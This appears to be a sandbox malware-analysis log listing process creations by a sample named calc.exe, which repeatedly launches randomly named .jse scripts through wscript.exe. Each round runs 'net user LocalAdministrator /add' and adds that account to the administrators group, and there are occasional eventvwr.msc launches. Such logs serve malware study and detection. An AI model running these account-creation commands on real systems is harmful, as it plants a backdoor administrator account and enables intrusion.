Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net1.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" nmkcc07AEX.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" BqmogIcAUc.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Jtk8zxQOt2.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" PZr1luuECN.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 5BgbSwcYMy.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net1.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 38gtKBXT3l.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" oiAgAiPmEb.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 0ivQggl30s.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" rYJ0AO4T7K.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" osIg59v0bz.jse
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" BKnQ77VBHl.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" gszpj8rp81.jse
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: unknown	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Kiql0emrm5.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" KobIITTimt.jse
Source: unknown	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" N0NpXvrAfH.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" mumMT6WOaG.jse	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fhZL0KwyiV.jse	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" IDsLsRQlEe.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" cNs6XgJUw5.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" rbLiDVEIXX.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" UqWLwYRtxi.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" iy4J2BVXGi.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" G0MZ6GMwly.jse
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" nPYwCIjDlS.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fevGSHOMU4.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" jkdKCpQjxW.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" iTc0FWDklf.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Ssbk19MNG3.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
